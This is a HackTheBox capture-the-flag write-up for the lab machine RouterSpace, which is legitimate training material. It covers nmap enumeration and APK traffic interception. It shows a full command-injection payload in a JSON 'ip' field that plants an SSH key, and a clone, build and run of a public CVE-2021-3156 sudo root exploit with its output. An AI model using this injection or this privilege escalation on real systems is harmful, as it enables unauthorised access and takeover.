Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 26 Feb 2022
IP: 10.10.11.148

HackTheBox’s RouterSpace is an easy level machine.

Enumeration

nmap scanning result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
Nmap 7.92 scan initiated Sun Feb 27 05:29:36 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up, received echo-reply ttl 63 (0.064s latency).
Scanned at 2022-02-27 05:29:37 UTC for 27s
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON VERSION
22/tcp open  ssh syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
|   256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open  httpsyn-ack ttl 63
| fingerprint-strings: 
|   FourOhFourRequest: 
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-36197
| Content-Type: text/html; charset=utf-8
| Content-Length: 75
| ETag: W/"4b-KZcRsggwbUpRJYgbfVTb/p3UStY"
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: Fg ZRH1 qQ R 4nHFujeu }
|   GetRequest: 
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-66742
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-97235
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| GET,HEAD,POST
|   RTSPRequest, X11Probe: 
| HTTP/1.1 400 Bad Request
|_Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 29EA086BA90A060F34EF3D8115988BC1
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=2/27%Time=621B0C52%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=2/27%Time=621B0C52%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-66742\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Sun,\x2027\x20Feb\x202022\x2005:29:55\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-97235\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Sun,\x2027\x20Feb\x202022\x2005:29
SF::55\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,131,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-36197\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2075\r\nETag:\x20W
SF:/\"4b-KZcRsggwbUpRJYgbfVTb/p3UStY\"\r\nDate:\x20Sun,\x2027\x20Feb\x2020
SF:22\x2005:29:55\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x20Fg\x20\x20ZRH1\x20qQ\x20R\x20
SF:4nHFujeu\x20}\n\n\n\n\n\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 27 05:30:04 2022 -- 1 IP address (1 host up) scanned in 27.58 seconds

Foothold

lets open the webpage in browser.

Then, from the webpage, download the http://10.10.11.148/RouterSpace.apk

I uploaded this apk to MobSF, but nothing interesting came up.

So I decided to install an apk in Android emulator and then try to intercept the request.

I use Android Studio, but you can use any emulator you want.

If you don’t know how to intercept requests from emulator, check out this: https://medium.com/@bastian.ohm/analyse-network-traffic-with-burp-suite-on-android-3cefbf02af2e

TSDZhsD

lets add routerspace.htb in /etc/hosts

User Flag

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, /
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{“ip”:”10.10.14.xx”}

I changed the IP to mine and received a request from routerspace.htb.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
tcpdump -i tun0 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
01:08:51.272117 IP infosec.52882 > routerspace.htb.http: Flags [S], seq 2011016043, win 64240, options [mss 1460,sackOK,TS val 1432270006 ecr 0,nop,wscale 7], length 0
01:08:51.313977 IP routerspace.htb.http > infosec.52882: Flags [S.], seq 2413504831, ack 2011016044, win 65160, options [mss 1285,sackOK,TS val 79265623 ecr 1432270006,nop,wscale 7], length 0
01:08:51.314012 IP infosec.52882 > routerspace.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 1432270048 ecr 79265623], length 0
01:08:51.314181 IP infosec.52882 > routerspace.htb.http: Flags [P.], seq 1:286, ack 1, win 502, options [nop,nop,TS val 1432270048 ecr 79265623], length 285: HTTP: POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
01:08:51.354819 IP routerspace.htb.http > infosec.52882: Flags [.], ack 286, win 507, options [nop,nop,TS val 79265664 ecr 1432270048], length 0
01:08:51.359955 IP routerspace.htb.http > infosec.52882: Flags [P.], seq 1:252, ack 286, win 507, options [nop,nop,TS val 79265669 ecr 1432270048], length 251: HTTP: HTTP/1.1 200 OK
01:08:51.359973 IP infosec.52882 > routerspace.htb.http: Flags [.], ack 252, win 501, options [nop,nop,TS val 1432270094 ecr 79265669], length 0
01:08:51.360218 IP routerspace.htb.http > infosec.52882: Flags [F.], seq 252, ack 286, win 507, options [nop,nop,TS val 79265669 ecr 1432270048], length 0
01:08:51.361783 IP infosec.52882 > routerspace.htb.http: Flags [F.], seq 286, ack 253, win 501, options [nop,nop,TS val 1432270096 ecr 79265669], length 0
01:08:51.402351 IP routerspace.htb.http > infosec.52882: Flags [.], ack 287, win 507, options [nop,nop,TS val 79265712 ecr 1432270096], length 0
10 packets captured
10 packets received by filter
0 packets dropped by kernel

let try some command

5CXtDQ6

It was successful.

create a listener on port 1234

1
2
nc -lvnkp 1234
Listening on 0.0.0.0 1234

then send a request with a bash reverse shell payload, and it fails

I looked for the ssh key but couldn’t find it.

As a result, I added my ssh public key to the target machine.

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, /
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 619
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{“ip”:”10.10.14.xx; echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNapKa7+twt/vE+t5fhsRMPjDHOdfCUG38FYPU32PxD5nRUD5mi281AXHru1ebX2n/wStOrFFmIDyjW4/Zd0BZASoD+MXcERwTMgFtBYFGh+5Oy1cUJaM/0otHY7tCTk/vqqpaRV/PS9Qo18qtpBsI6nUFEFzBpJGqiWjxCdKMQ15Dxgyd0/D7jnZZD7GslYPXR/PfxEu4bkSrltA4tAG0JP02H52m6XP1j8Ysv8dccB/Ps5ir6X3g9bLOciTTP7wvtVVEtRqF2Q0Avp8c5Ef14Rd9JUWJcYDYk3Qxep09QsujbT4oNgBotnaslge+kpBykfp9esi6v8jWcQcs+zWNYephKlE/Ufp7HpnM1qWjiTxC1dSbU5knegKyaqSJB6XiItkh2yagt+hERMmqAFwW6mOhIYImHdaRWEbymJMOhRc8VbZubxCw6S88WIkgvcEh7NauLr7KgGC0KGQepMt/TyQQC6w+GZTKgUpbdco7loEmYaXJmjjdomqale8ItGM= root@infosec’ > ~/.ssh/authorized_keys”}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
ssh paul@routerspace.htb 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support:https://ubuntu.com/advantage

  System information as of Tue 19 Apr 2022 02:19:35 AM UTC

  System load:   0.08
  Usage of /:70.7% of 3.49GB
  Memory usage:  16%
  Swap usage:0%
  Processes: 223
  Users logged in:   0
  IPv4 address for eth0: 10.10.11.148
  IPv6 address for eth0: dead:beef::250:56ff:feb9:9e4e

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Nov 20 18:30:35 2021 from 192.168.150.133
paul@routerspace:~$ cat user.txt 
eba216e20a9938dc19f08cbb7eb4xxxx
paul@routerspace:~$

got user flag

Root Flag

After running the linpeas.sh script,

It indicates that sudo version is vulnerable

1
2
3
4
5
paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit

I used this repo https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit.git

1
2
3
4
5
6
7
git clone https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit.git
Cloning into 'Sudo-1.8.31-Root-Exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 9 (delta 0), reused 6 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.

Copy the exploit files to the target machine and run the exploit file.

1
scp -r Sudo-1.8.31-Root-Exploit paul@routerspace.htb:/tmp/sudo
1
2
3
4
5
paul@routerspace:~$ cd /tmp/sudo/
paul@routerspace:/tmp/sudo$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
1
2
3
4
5
paul@routerspace:/tmp/sudo$ ./exploit 
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
0600eed8a854681276020a878a84xxxx